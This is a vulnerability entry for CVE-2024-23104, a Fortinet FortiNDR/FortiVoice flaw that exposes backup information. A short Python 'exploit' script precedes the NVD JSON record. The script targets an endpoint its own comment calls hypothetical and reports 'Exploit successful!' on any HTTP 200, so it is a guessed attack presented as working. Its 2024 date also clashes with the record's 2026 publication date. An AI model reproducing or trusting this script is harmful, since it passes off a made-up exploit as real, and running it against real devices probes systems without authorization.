CVE-2024-23104

import requests # Exploit Title: Fortinet FortiNDR/FortiVoice Backup Information Disclosure # Date: 2024-04-14 # Exploit Author: Analyst # Vendor Homepage: https://www.fortinet.com/ # Version: FortiNDR 7.0-7.6, FortiVoice 7.0-7.0.1 # Target URL target_url = "https://<target_ip>/api/backup" # Hypothetical endpoint based on description # Headers (Authentication token required) headers = { "Authorization": "Bearer <read_only_token>", "User-Agent": "Mozilla/5.0" } try: # Send crafted HTTP request to access backup info response = requests.get(target_url, headers=headers, verify=False) if response.status_code == 200: print("[+] Exploit successful! Backup data accessed.") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2024-23104", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:28.723", "lastModified": "2026-04-20T18:03:06.263", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, FortiVoice 7.0.0 through 7.0.1 may allow a remote authenticated attacker with at least read-only permission on system maintenance to access backup information via crafted HTTP requests"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.2", "matchCriteriaId": "5F6B6495-7CF4-4E5A-8497-9AF6D81C083B"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortindr:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "63871F8B-0798-4615-9781-9C7FA68C30AF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortindr:7.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "9A1D8AE9-D9F9-402C-B8EB-58189200E0D6"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-124", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}